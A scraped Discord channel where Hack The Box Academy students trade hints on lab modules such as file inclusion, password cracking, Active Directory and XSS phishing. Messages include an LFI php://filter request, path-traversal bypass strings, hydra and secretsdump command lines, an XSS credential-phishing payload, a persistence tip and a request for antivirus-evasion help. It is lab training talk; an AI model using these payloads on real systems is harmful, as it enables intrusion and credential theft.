#modules

1 messages · Page 53 of 1

woven sparrow
#

for both yes.

#

same user

devout cliff
#

ive never had that error outside of not having a sub i think so thats odd.

#

could try logging out and back in

#

see if it clears it

woven sparrow
#

did that, but I'll try again

woven sparrow
#

thanks

devout cliff
#

¯\ (ツ) /¯

vital adder
#

i also got no idea what you mean in the first half but your command is right but i would recommend you use the windows/x64/shell/reverse_tcp for payload

uncut mirage
#

Hi all,
I'm in the Password Attacks module, Pass the Ticket (PtT) from Linux section trying to to get the credentials for the user svc_workstations and using them to authenticate via SSH.|| In the crontab I found the svc_workstations.kt file and managed to extract an AES-256 hash from it. I tried CrackStation.net but they do not support AES-hashes. Then I tried various hashcat modes (17010, 19700, 19900, 1400, 26403 among others) but it doesn't even let me run it most of the time. Usually stating the error "Separator unmatched, No hashes loaded". Letting hashcat auto-detect the hash doesn't help either. After miserably failing all attempts at cracking the hash I tried another approach instead.
I impersonated the svc_workstations user with the obtained .kt file and gained access to \\DC01\svc_workstations where I found the flag.txt file. But when opening the file the fist two characters is malformed (��Keytab_Scr1pt$-F1l3s) so HTB won't accept it.|| Please give me a hint on how to proceed 🙏

ripe badge
#

pm me

wheat adder
#

hii so I am having a problem with apache 2 which is in Linux fundamentals module
I installed apache 2 but when I browse http://localhost it just says error refused to connect so I figured to do "sudo service apache2 start" which didnt do shit XD

sick zephyr
#

Does the vpn have a problem?

#

Blue box cannot be spawned at all

vital adder
#

i was in using the academy vpn a bit ago and it's working fine right now i'm doing offshore and that vpn also are working fine

vital adder
vital adder
vital adder
#

find the port 80 and change it to something else

#

but this is only necessary if you are on the pwnbox, simple thing like this you can just do on your vm

wheat adder
#

no am on my terminal on my own vm

#

sorry if i sound dumb am still new to this XXDD

vital adder
#

as long as you don't as dumb shit like how to hack you are good

wheat adder
#

lmfao

vital adder
#

also you can read the config file (at /etc/apache2/ports.conf) to see what the port is, most likely it will be the default port (80) but if you can confirm that apache2 is running nothing on port 80 then you should check the port

vital adder
# wheat adder

it's http, but if it's can't connect it's will auto change the url to https

wheat adder
#

yeah it does that

vital adder
#

so is the default port still 80?

wheat adder
#

it tells me there is no such directory when i do cd /etc/apache2/ports.conf

vital adder
#

that's not a directory it's a file

#

use cat

wheat adder
#

oh

vital adder
#

there is a Linux Fundamentals module on the academe so if you are new to linux give that module a go

#

i think that module also show you some stuff about apache

wheat adder
#

dude

#

its why am askin about apache

#

XXXDDDD

vital adder
#

why tf would you use firefox in your vm for the academy?? if your kali don't have much ram or resource then just use the browser on your host

wheat adder
vital adder
#

also you can use sudo netstat -ltp to get a list of running process and if apache2 is running on the port 80 you will get [::]:http

autumn pilot
#

why are you searching for passwd.php?

vital adder
wheat adder
#

okay thanks XXD

autumn pilot
#

how to know, it is written in the question

#

read the question and then think

#

yes, it is written in the question the last word

wheat adder
vital adder
#

so nothing on localhost:8080 ??

uncut mirage
vital adder
#

try curl localhost:8080

wheat adder
#

just printed a lot of lines of html and css

vital adder
#

yeah that is apache2

#

no idea why you can't access it from your browser but apache2 is clearly running

wheat adder
#

me niether

#

ok man appreciate it broski

balmy radish
#

You are doin https instead of http in your browser

wheat adder
#

nah xD

#

it just returns it with https automatically despite i put it as http

placid quest
#

@wheat adder try to change it with brup

dim wolf
#

if you clear the browser search bar and type the IP address it should work

supple kite
radiant marten
#

Any help would be appreciated, I'm on the last question of the Using Web Proxies Skills Assessment and I feel like I don't understand the wording of the question... basically capture traffic request from metasploit through proxy (burp or zap) and "find the directory being called in '/XXXXX/administrator/'..?'" the hint says to use any website as RHOST, so I'm not using the provided target system for this ?

calm abyss
#

Hello guys i have a problem with final exam in LFI

https://academy.hackthebox.com/module/23/section/513

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

I tryed everything... and nothing works.

This is what i found about the target

http://134.122.103.40:31516/index.php?page=value

Server: nginx/1.18.0
Powered-By: PHP/7.3.22
ary: Accept-Encoding

I tried PHP Wrappers but it returns blank /etc/php/X.Y/fpm/php.ini

curl "http://<SERVER_IP>:<PORT>/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.3/apache2/php.ini"

Returns blank

#

i passed this but i got stuck on the exam myself

devout cliff
radiant marten
#

@devout cliff Thank you very much ! I got it to work with burp, dunno why it wasn't working with zap yesterday.

devout cliff
#

np

dim wolf
calm abyss
dim wolf
#

if you can't get any of those to work, look for something else that could be useful

calm abyss
dim wolf
#

something that would really help here is ||page source code||

#

leverage the knowledge you've gained from the module to find what you should be looking for

calm abyss
dim wolf
#

localhost

wheat adder
#

how do i view its ip address

dim wolf
#

no you just type localhost

wheat adder
#

no doesnt work

dim wolf
#

that sucks then

wheat adder
#

XD

dim wolf
#

when the browser gives me a hard time with HTTPS not changing to HTTP i just clear the search bar and type it again and it usually works

wheat adder
#

yeah i do it too

fathom pendant
wheat adder
#

but nothing is working

rustic sage
#

try http, not https

wheat adder
#

lol that aint da case

fathom pendant
#

Do netstat -l

dim wolf
#

for some reason it changes to https automatically..

wheat adder
#

yep

fathom pendant
#

See what port it's listening on

dim wolf
#

automagically imo

wheat adder
calm abyss
wheat adder
fathom pendant
#

That's why

#

Put in localhost:8080

devout cliff
wheat adder
#

yeah it works thank yoouu

#

@devout cliff @fathom pendant @dim wolf

fathom pendant
#

Http protocol defaults to 80, it automatically switches to 443 if it doesn't detect a service running on 80

dim wolf
rustic sage
#

Can anyone give me a hint for the broken auth skills assessment? dm to avoid spoilers?

calm abyss
#

gobuster time

fathom pendant
#

Oh yeah that reminds me I went to sleep earlier when I threw John at the hard skill .vhd file

dim wolf
#

well, did you get a hit?

fathom pendant
#

Idk lol I was tired af and was like "I could use sleep"

dim wolf
#

i did the same thing with the hashcat skills assessment

#

except that was a complete waste of time

rustic sage
calm abyss
calm abyss
fathom pendant
#

@dim wolf ggez

dim wolf
#

excellent

raven cairn
#

Are there any modules/sections on getting persistence?

#

Cuz like nothing in CPTS covers it at all and I feel like that is really important

fathom pendant
#

Theoretically you could hide a shell file and create a benign system service to call to

thorn urchin
#

Its not that important for the level CPTS aims at

#

or at least, the very obvious ways to persist that you should be able to run two braincells together to figure out is more than adequate for the non-evasive testing that CPTS teaches

calm abyss
dim wolf
#

is it tomorrow already??

calm abyss
dim wolf
#

how can you grab the full source code of a page?

#

you won't be able to get the full source code if you simply right click and open page source

#

that will not tell you everything

calm abyss
dim wolf
#

that will not tell you what goes on on the backend

calm abyss
#

than burp ?

dim wolf
#

that will not do either

#

if you can find some way to get the full source code of the webpages

#

maybe you can just read the source code from the server itself??

#

Like... you can somehow manipulate something
For example, a request you send to the server
I think that if you can manipulate it somehow, it will give you what you're looking for

sudden cloak
#

I keep getting a error on the DCsync assesment in the AD module: Someone else who has this problem to and knows how to solve this? python3 secretsdump.py -just-dc INLANEFREIGHT/adunn@10.129.21.35 -outputfile hash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[-] NTDSHashes.init() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up...

dim wolf
#

was that subtle enough?

calm abyss
#

enough for a start

calm abyss
dim wolf
#

you may benefit from rereading some sections in the module

#

PHP wrappers

fathom pendant
#

what share are you trying to connect to?

#

Take a look closely at the question; it's not asking you to connect to the share :) it's just asking you what the Full FilePath is

#

you ARE meant to RDP into the machine

#

ah so you're using the pwnbox

#

you should be able to use smbclient //IP/share-name -U htb-student

calm abyss
fathom pendant
#

¯_(ツ)_/¯

#

Try resetting the target

#

going through the steps again

#

and trying to connect agian

#

then idk man best to just move on, plenty of modules make proper use of it ¯_(ツ)_/¯

#

it doesn't matter which rdp command you're using to connect

#

RDP is RDP

#

xfreerdp /u:"username" /p:"password" /v:IP

calm abyss
fathom pendant
#

are you trying to smbclient from within the windows host?

#

if so: that's why

#

try smbclient from the vm

dim wolf
# calm abyss I cant figure this out

ok. start from the beginning.

start the skills assessment VM. look around and search for a potential LFI. if there is one, see how you can exploit it and what information you can get from it.

sly reef
#

can someone help me with linux priv escalation module?

calm abyss
kind vessel
#

Hello someone can help me with CrackMapExec Skill Assessment ?

calm abyss
#

the rest is Invalid input

kind vessel
dim wolf
calm abyss
fathom pendant
#

@final trench best not to get hung up on trying to follow along too closely sometimes

sly reef
kind vessel
sly reef
#

i got a better one tho

sly reef
calm abyss
sly reef
calm abyss
sly reef
#

you can try many filter bypasses (....//....//....//....//etc/passwd, etc)

#

you should re read the sections

#

also IP:PORT/index.php?page=/etc/passwd wont display etc/passwd cause this path isn't present in the web root folder

#

always go back

fathom pendant
#

^

fathom pendant
calm abyss
fathom pendant
#

or is that a filter thing

sly reef
#

there are filters wich remove sus payloads from petitons

#

one pretty common removes ../

#

so ....// - ../ = ../

fathom pendant
#

clever girl

calm abyss
fathom pendant
#

that's the question he's struggling with

sly reef
#

i mean yeah, that is literally the final assesment

fathom pendant
#

:^)

#

usually the answer is within the modules though

sly reef
#

it is

#

seems like he rushed them

#

doing lfi like this IP:PORT/index.php?page=/etc/passwd makes 0 sense

fathom pendant
#

yeah

#

that just looks incorrect

#

I understand testing lfi by checking /etc/passwd

#

but generally you need to get to that root folder

sly reef
#

thats it

fathom pendant
#

page= just means that in the index (webroot) where are you navigating to?

sly reef
#

page is a GET parameter

dim wolf
#

sometimes that value works and it opens up /etc/passwd

#

but usually it doesn't

sly reef
#

only if web root dir isnt specified i guess

fathom pendant
#

but it's best practice to just walk it back first

sly reef
#

otherwise / = /var/www/smthng usually

sly reef
fathom pendant
#

ye

calm abyss
#

i am improving i got base64 decoded

chilly cosmos
#

Hello, I am stuck with this question Escalate privileges using the same Kernel exploit. Submit the contents of the flag.txt file in the /root/kernel_exploit directory.

calm abyss
dim wolf
#

you don't have to ping me for everything..

supple jackal
devout cliff
#

thats odd

supple jackal
#

right

#

lol fml

#

do i restart again lol

main ridge
#

Hi, everyone, I have to perform subdomain enumeration against gihubapp.com for the final question in the Information Gathering Web Edition module, to find a subdomain that has the word 'triage' in the nam. Already tried using sublist3r multiple times, as the hint suggests, but it didn't work. Any ideas?

calm abyss
fathom pendant
sly reef
fathom pendant
#

^

#

"use the exploit and do the thing"

Guys help idk what to do

#

sums up half of what it is here LOL can't say I haven't done the same though

chilly cosmos
#

i do following

dim wolf
#

spoiler that link thx

sly reef
#

guys does anyone know to get a interactive shell form meterpreter without python?

dim wolf
#

there's some information about that in the Shells & Payloads module

sly reef
#

noted

#

thanks

fathom pendant
#

I would say this image would be a spoiler

supple jackal
#

ugh my bad

alpine dome
#

I am trying to complete the Footprinting-Hard Challenge but the openssh private key keeps getting denied as Permission denied (publickey). I have set the rght permission and ownership options.

fathom pendant
#

are you sure you copied the id_rsa correctly?

#

with the --Start and ---END blocks?

alpine dome
#

Yes, of course.

#

I have used the 1 FETCH 1 body[1] command to fetch the key.

#

How can I display the whole message?

honest ridge
#

rfc822

fathom pendant
alpine dome
#

Maybe tom is not the username?

fathom pendant
honest ridge
#

if you are only getting a little bit of the message and you want the full message when in the mailbox i think you have to -rfc822

fathom pendant
#

¯_(ツ)_/¯

dim wolf
fathom pendant
#

that's what they did

#

oh wait

#

nvm

alpine dome
#

It was the f*cking copy-paste

fathom pendant
#

I see what the difference is

#

also sometimes copy/paste adds an additional line that rsa doesn't like

teal hound
#

Try another field for the payload, and try the payload from the session hijacking lesson

alpine dome
#

It screwed up bu not importing the whole last line.

fathom pendant
#

F

honest ridge
fathom pendant
#

I didn't care enough to use tmux

fathom pendant
teal hound
#

No, lol 😂

fathom pendant
#

i'm glad I realized I could filter the Stdout as a command is running so that I didn't just have a wall of "Logon_Failure" in CME unless there's a way to filter it out in cme that I'm too dumb to know

shut juniper
#

Are there any modules that show use of Sliver?

fathom pendant
#

there's a search function in the modules page

#

¯_(ツ)_/¯

sterile temple
#

PIVOTING, TUNNELING AND PORT FORWARDING. Im on the last question, where i need to get the flag from the Domain Controller, i think i already have the IP of the machine but i cannot manage to hace access. Im using netsh on the 2 and the 3 machine to get access to the Domain Controller (the 4 machine) it is possible that I am doing more that i'm suppose to hahaha i'm missing something. any help is appreciated guys

light bobcat
#

what academy modules would allow me to do a majority of the easy HTB machines asap (like within the next couple days). im assuming "Getting started" and "penetration testing process". i was doing photobomb but had to self learn burpsuite and web attack vectors because i hadnt gotten through that in Academy yet

#

submitting my resume somewhere by end of next week and want to get to script kiddie or the one above that before i submit so i can include that progress in my resume

fathom pendant
#

being completely honest here: if you only do the easy boxes just to have this illusory prestige - then you're not actually looking to learn how to use tools

#

there are plenty of modules regarding the fundamentals

#

that are all 10 cubes and refund 10 cubes once completed

#

so essentially "free"

light bobcat
#

so would it be better to show what ive gotten through in the academy compared to machines?

#

i have student plan so i can do up to tier 2 but obv ill start with the basics. just wondering if the "getting started" and "penetration testing process" should be the ones i do first

fathom pendant
#

it depends on the job tbh

light bobcat
#

its for work placement so technically i dont know the job. just trying to stand out compared to other classmates

fathom pendant
light bobcat
#

yeah fiar. i guess ill just do what i can within the next week

fathom pendant
#

delete the picture and yes you're very close just the orientation may be off

#

how are linux files shown compared to windows?

#

cough look at your own linux terminal

#

pwd

#

mhm

#

:)

#

YEP

#

lol

#

that's why i was like "you're THIS close"

harsh mason
#

stuck here, "Firewall and IDS/IPS Evasion - Hard Lab". Please hint 😉 Thinking large data = UDP, tried fast UDP with no DNS resolution and service detection with decoy random:5. Already exhausted TCP stealth techniques (fragment, MTU, min-max ttl, etc.

#

@slender shoal mind is focusing on the administrator going to training for "one week" and having to change protocols

#

@slender shoal right direction?

#

copy... I'll look back in the module (crosses fingers)

plain coral
dim cosmos
#

hi everyone

harsh mason
#

@slender shoal @plain coral Thanks for the tips... main thing I learned... patience is a virtue. Just wasn't waiting for it.

fresh reef
#

o7 HTB, On Pivoting, Tunneling, and Port Forwarding Skill assessment and have lsasso'd some cred for v*****... I'm now stuck figuring out my next move towards the DC....also on another now How do we id a DC in our pentesting context - "from outside peering in"?

honest ridge
#

mod= File Transfers -section Windows File Transfer Methods -2nd question. cant connect RDP- tried xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.201.55 also tried using remmina and just errors out with freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]

any ideas?

analog tendon
#

does anyone know what were supposed to be doing on the nessus assessment. it says to log in to the machine which i have but it doesnt seem to have the nessus service on it

Edit: Nevermind i figured it out

glossy cipher
#

questions for Active Directory Enumeration & Attacks

  1. for DCSync Q3, am i suppose to use the windows RDP to get the answer? (i got the answer by using chisel and following the previous steps)

2.For Privileged Access Q3, same question as above, i basically just use chisel to connect them together @.@

  1. for AD Enumeration & Attacks - Skills Assessment Part I,
    do i have to do everything in that webshell or can i just get a new shell from it?
indigo belfry
#

Skills Assessment - Using Web Proxies - The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer. Looking for a nudge on this. The cookie I see is already in cleartext cookie: X*******. Have tried multiple decoding variations, but can't see anything. Thanks!

cloud skiff
#

I am not able to connect to windows 10 VM using RDP. I get errors each time try to connect. I am on windows fundamentals.

#

Nvm, I solved it by just changing the VPN file and restarting the VPN several times and now it works.

deft escarp
#

I'm going through the network enumeration with nmap module and although I've gotten the flags for the boxes, I can't seem to get ip spoofing to work. In the examples it works fine when spoofing your IP with Nmap from the same subnet as the host you're scanning, but when I do it
-S 10.10.10.10 -e tun0
Nmap says it can't find the route.
I read off of Google that you have to be in a place to capture those returning packets (like attached to the network you're scanning), but in the context of this module/lesson, im a bit confused

cloud skiff
#

only after connecting of 4-5 seconds.
ERROR - ```xfreerdp /v:10.129.36.104 /u:htb-student /p:Academy_WinFun!
[09:30:53:937] [14279:14280] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:30:53:937] [14279:14280] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core] - freerdp_post_connect failed

hazy grotto
#

ffuf only 1/8th done after 30 mins... thread count 200

#

WTF any tips?

fathom pendant
fathom pendant
hazy grotto
#

IP is goign to reset before i even finish the scan.

fathom pendant
#

oofda

hazy grotto
#

Has anyone had antvirus block websites while doing ffuf?

#

blocking for malware?

#

Is HTB trying to hack me?

peak hamlet
#

@tidal kelp you are on the right path, ||check the log file "Responder-Session.log" under /usr/share/responder/logs||

wide folio
#

can I use openvpn connect and vnc on my Android tablet for htb?

deft escarp
#

Just curious but how long is the longest you guys and girls have spent on a box because you refused to see the hint?

modest isle
#

Good morning guys

fathom pendant
#

~3-4 hours

deft escarp
fathom pendant
#

ye

#

one of the boxes for the module section i'm on i had to reset several times for the service to pop up

tidal kelp
modest isle
#

Is it impossible to attack a Apple device?

deft escarp
#

No

#

A cyber-crime group called Pegasus had done it a lot actually

modest isle
#

So, why is it never mentioned in most HTB?

peak hamlet
modest isle
#

I think as hackers, we should also know about Mac & iOS attack methods

shadow canopy
#

i see in Active Directory Enumeration & Attacks, "sudo crackmapexec".
is it important to use sudo with crackmapexec?

fathom pendant
modest isle
#

Okie...

#

What about a pentest job comes up for an Apple system?

peak hamlet
fathom pendant
#

you learn how to attack apple devices; i'm just stating the common reason why

modest isle
fathom pendant
#

not necessarily it's mostly compatibility

#

Apple Devices run off a fork of Unix

shadow canopy
fathom pendant
#

so technically most things that would run (i.e. linpeas) would work

hazy grotto
fathom pendant
#

it's an exploit checker that checks common exploits and tests to see if the user can perform them in terms of privesc

modest isle
#

Kudos man!

#

You're good

hazy grotto
#

Whats yall opinion on the hardest module?

thorn urchin
#

Documentation and Reporting if you actually do it right

#

if you just want it checked off, its super easy to blitz through it

#

but if youre doing it right and its youre first time actually dealing with making reports and formatting findings while mixing it into your methodology? its brutal

sand hearth
#

Modul: INFORMATION GATHERING - WEB EDITION
Section: Page 7/ Active Subdomain Enumeration
**Problem: ** I dont know what should i do with ip in Q:4,5
Can someone help me?

cedar whale
#

Anyone has a nudge for me on Broken Authentication skilss assement? With the wordlist shown in the modules I find my own test user and one other + the user I got from reading the website

#

Tried bruteforcing the password of the account found on the website using a filtered rockyou based on the password policy but didn't seem to get a hit

#

I know how the cookie works but I get an error page if I tamper it to another user

silver zenith
#

It kind of the same structure

cedar whale
#

Hey guys,
I'm doing Web attacks skills assesme but the reset token doesn't change when i request it so I get invalid token

foggy sierra
#

any one did LPE module , i have a question Note: There is a way to obtain a shell on the box instead of using the SSH credentials if you would like to make the scenario more challenging. i need a hint

devout cliff
#

when i did it i wanted to throw my pc out a window so many times

#

i had to ask for so much help because it felt like the module used things and asked for additional weird knowledge outside from what they taught you

#

but its been several months since i took it, so i dont remember all the details of it

dim cosmos
#

im about to start the attacking common apps skills assessments, do i need to lock my windows?

devout cliff
#

i havent done it yet

dim cosmos
#

i got so frustrated with broken authentication ive parked it for now

#

hate wild goose chases wondering if you have the right wordlist or not lol

cedar whale
cedar whale
devout cliff
devout cliff
#

i would have to redo the assessment

#

i dont have my notes on it anymore, they went poof

dim cosmos
#

sorry mate no, try searching the hackthebox forum

#

i found a lot of nudges in there also

cedar whale
#

yeah, did the same thing. I think I should have the right thing now for brute forcing but somehow it is not working ...

#

so would be handy if I could verify with someone

jaunty mortar
#

You almost there; just ensure every line in the numbers.txt file is prefixed with htbadmin e.g "htbadmin1676025163010". A tool like 'sed' can be handy

cedar whale
#

mmh anyone had the same problem where the attempts don't seem to go down?

devout cliff
#

maybe turn down the thread count?

#

im not sure

#

try default thread count and see what it does

cedar whale
#

no difference hmmm

devout cliff
#

i wish i had more time to look into it but just looking at it i dont see the issue. have you already tried resetting the box? other than that i would just double check any syntax in the command. it seems that hydra isnt hanging but maybe getting an error from the box? i would maybe proxy the output to burpsuite/zap and see how everything looks from both sides and then troubleshoot from there

devout cliff
#

yeah i would need to look at it later today to remember what issues i had with the module as a whole. i can imagine it might give me some ptsd-like symptoms though once i recall what happened

#

i just remember it was not a good time with that module. i think it took me maybe like a week or so to finish?

cedar whale
#

a forum post mentioned that you can do it with rockyou-10 but testing with burp as well now and it seems that it is not in rockyou-10

tribal plume
#

Anyone have a help for Login Brute Forcing - Skills Asessment Website (question 2, the login form)? The hint says to use the username you found earlier--the user name found in the question before was ||user||. I noticed the parameters were different so I changed them and the fail string. I'm trying: ||hydra -l user -P rockyou-10.txt -f 134.122.103.40 -s 31941 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"|| (rockyou-10.txt is in the directory)

cedar whale
#

You have to add that one to be able to reach the website

#

However, I’m struggling too bc even with that it didn’t work for me yet

tribal plume
#

I'll add that.

cedar whale
torn blade
#

imm on the XSS phishing module in the acedmy. it says port 80 is alrady in use so i cant use netcat to listen on port 80. how do i fix this

#

the process running on port 80 presumably is the HTB browser cause if i kill the pid the entire box goes blank

#

the instructions say to do nc -lvnp 80 but it just wont work

turbid lily
#

how about running on another port that is not being used?

torn blade
#

if i try using like 8080 i get nothing back from the /send.php page\

cedar whale
turbid lily
#

but you are providing almost no info. Why do you want to listen for? Why port 80?

torn blade
#

think its cause im having isdues removing a form hmmm

cedar whale
brave palm
#

can somebody pls explain me why tf its not connecting to mysql db?

#

i dont understand if the server has some connectivity problems or not, been trying to refresh the target several times, im wasting time just to try to connect to a db wtf hahah

tribal plume
torn blade
#

can someone tell me which part of this script is fcking up (sending ss one sec

tribal plume
torn blade
#

oh fck its getting URl encoded

#

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

#

thats the base of the script, but it isnt removing the image box at the top

brave palm
cedar whale
tribal plume
torn blade
#

like i think i need the form removed but code aint working, ive confirmed the form is called urlform

cedar whale
tribal plume
kind fjord
#

Hi, I need help for the live engagement - Shells and payloads on the second question. I upload the .war file and it was successful and I have the shell, but I cannot reach the folder C:\Shares, I don't now why, I try different commands (dir,ls,tree,cat) but still don't work. Maybe it's something simple but I'm lost 😦

torn blade
#

ok simpler example cause this is the main issue

#

when i just try using this document.getElementById('urlform').remove();

#

it does not remove the form even if thats the only part of the script

#

urlform is 100% the name of the form

sacred ermine
#

any help or advice for this Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john ? i cannot solve it

module: password attacks
sec:pass the ticket

brave palm
#

im confused

robust acorn
#

p

uncut mirage
#

Hi all,
I'm in the Password Attacks module, Password Attacks Lab - Easy section, trying to find the root password. ||I've managed to get access with user mike via SSH and have tried all search scripts in the Credential Hunting in Linux section without anything noticeable sticking out. Furthermore i tried looking at the /etc/passwd and /etc/shadow files but they don't seem to have a weakness. I also tried downloading LaZagne via smbserver.py but was unable to because smbclient is not installed on the target. I also tried downloading it via python3 -m http.server 8000 but was unable to unzip the file I had saved Lazagne in. I have also confirmed that it is not connected to an AD with the realm list command.||
Can i get a hint please? 🙏

tight basin
brave palm
tight basin
brave palm
#

never used this tool i a bit confused haha

tight basin
#

You're in the DB itself

#

so now you execute MSSQL Commands

dim cosmos
#

holy crap the common apps skills assessment 1 was tricky

brave palm
tight basin
#

Should be covered in the section, the basic MSSQL commands like showing databases,tables,columns , etc..

brave palm
severe sphinx
#

Hey people, I have a weird issue with ffuf. I'm working through the module "Attacking Web Applications with ffuf". Throughout the whole course I had this issue that ffuf would get really slow mid-scan, the req/sec would drop really low, the error counter would stack up, and my whole internet connection would not work. I couldn't load sites in the browser. Eventually the scan picks up again, goes to a normal req/sec rate, and my browser becomes responsive agian. This is really hindering the completion of the final skill assessment and general use of ffuf. Any ideas what's going on there?

echo jungle
#

help

low echo
#

try uname -a

dusty timber
#

Did that too

#

I tried all the numbers just in case and none of them works

dim cosmos
#

how scared should i be about starting AD enum and attacks? 😛

dusty timber
#

It says it updated 2023-01-12 so maybe they havent updated the reply box?

torn blade
#

if i am struggling on a moduel, is there a way i canj ust skip to the next one

#

like im in the bug bounty xss module and just struggling and would like to continue the bug bounty thing but just go to the next one

dusty timber
#

But I want to complete it and I want my cubes. Im not struggling to find the info, im struggling to make the proper info work

dim cosmos
torn blade
#

ye how do i skip to next one, ill come back later

echo jungle
#

anyone

torn blade
#

ah i figure it out i think

rustic sage
#

I'm so stupid that I can't do the first task haha

sacred ermine
echo jungle
#

anyone help me with web enum

#

getting-started module

fathom pendant
#

And you're using the pwnbox to answer this question?

dusty timber
neat charm
#

Hello @lethal atlas , where you able to resolve msf "exploit aborted due to failure: unexpected-reply" while running wp_admin_shell_upload. Being the user with admin creds, clearly the enumerated user has permission to upload files. There is no FW or AV . Not sure why it is not working? Any idea what worked for you?

viscid epoch
#

really ?

fathom pendant
#

It's all relative; I found the PW attacks pretty trivial tbh

lethal atlas
atomic ruin
#

Except fucking kira

fathom pendant
#

I hit the kira wall but wasn't stuck for too long

lime frigate
#

Can someone help me? I have a shellcode, I use the loader to load, but can not bypass the anti-virus software interception, may I ask what I should do? Is there anyone who can help me or provide some tools?

fathom pendant
#

What module is this related to?

cedar whale
#

Someone else working on broken authentication final assessment? Could use a small nudge (only lab left 🙂 )

lime frigate
#

I'm sorry

novel matrix
#

If not, can we please keep this channel module related.

viscid epoch
#

any hints

simple merlin
cinder mortar
#

anyone else has this error when trying to open the embedded burp browser?

#

this is under shells and payloads php shells

fathom pendant
#

Looks like burp doesn't have a default browser to use maybe?

cinder mortar
#

it does tho

#

been stuck for 1hr trying to get burp to work lmao

#

i even reinstalled the latest version

fathom pendant
#

Check settings, see if it's using Firefox

cinder mortar
#

here?

fathom pendant
#

Hmm not sure I havent had any issues myself with burp

cinder mortar
#

hmm maybe i try setting up foxyproxy then

#

thanks

neat charm
stuck flame
#

hello, can someone help me, I don't understand why I can't ping or do an nmap scan in the modules

fathom pendant
#

This section is about using the web techniques discussed to enumerate the system

stuck flame
#

I wanted to try to recover the version of wordpresse but thank you

fathom pendant
#

He has an interesting history

#

Maybe check there

#

Let me double check my notes

uncut mirage
#

will try again

fathom pendant
#

Yep

cedar whale
#

Does anyone know if it is normal for skills assesment of broken auth that you end up with 4 passwords from rockyou that are in line with the policy?

fathom pendant
uncut mirage
fathom pendant
#

just a note in the med/hard labs are where you'll use the mutated custom list so be prepared

#

just so you're prepared :)

uncut mirage
quiet surge
#

^ I did the exact same. Easy lab took me 3 days easy. Medium in my lunch break. Hard, maybe tonight 🙂

fathom pendant
#

from what i've heard with many of the password attacks related things: it'll either be the pre-given list or rockyou.txt

quiet surge
#

Really need to work out the approach before blindly starting, hehe. Also this module be like hey remember that password from 7 sections ago, use it here. Ugh, ofcourse I didn't save that...

fathom pendant
#

yeah

#

I honestly loved pw attacks because it was a test of how good of a note taker i was

#

alongside the general knowledge

quiet surge
#

Agree, I learned from it 🙂

fathom pendant
#

because I was able to jump from "ok I got this, what's the 2john I need to use for this?"

#

it's pretty fun though :)

cinder mortar
#

and it worked

#

wtf

fathom pendant
#

yeah that'll do it too

#

default I think burp uses chromium

devout cliff
cedar whale
devout cliff
uncut mirage
#

Ehm..??? my post disappeared?

devout cliff
uncut mirage
# devout cliff Might've had a spoiler idk

It didn't... Will try again... crackmapexec thinks it found the password even though it didn't. Anyone know why? How do i make it run?
||┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations] └─$ crackmapexec smb 10.129.89.36 -u john -p password.list SMB 10.129.89.36 445 SKILLS-MEDIUM [*] Windows 6.1 Build 0 (name:SKILLS-MEDIUM) (domain:) (signing:False) (SMBv1:False) SMB 10.129.89.36 445 SKILLS-MEDIUM [+] \john:123456||||┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations] └─$ smbclient \\\\10.129.89.36\\JOHN -U john Password for [WORKGROUP\john]: tree connect failed: NT_STATUS_BAD_NETWORK_NAME||

storm jackal
uncut mirage
# storm jackal use the verbose flag to check the details

||┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations] └─$ crackmapexec smb 10.129.89.36 -u john -p password.list --verbose usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,ftp,winrm,ssh,smb,rdp,mssql} ... crackmapexec: error: unrecognized arguments: --verbose||

#

???

storm jackal
fathom pendant
#

^

#

the arguments after smb are all related specifically to the smb

cinder mortar
#

Im on the shells and payloads assesment, may i know what is the default web browser for parrot os?

fathom pendant
#

so it's basically cme {arguments} {service} {service-arguments}

cinder mortar
#

ok thanks

fathom pendant
#

that's why you're not getting an answer

#

the other easy way is to just create a .html; navigate to the file; and attempt to open

#

¯_(ツ)_/¯

rustic sage
#

question
how am i actually supposed to do htb academy if it costs cubes
to get cubes you pay
i don't have money to pay, i have 40 cubes and the first module is 50 cubes?
wrong channel, maybe but I don't know where else to ask

uncut mirage
#

@fathom pendant: --continue-on-success iirc does not work - syntax error.
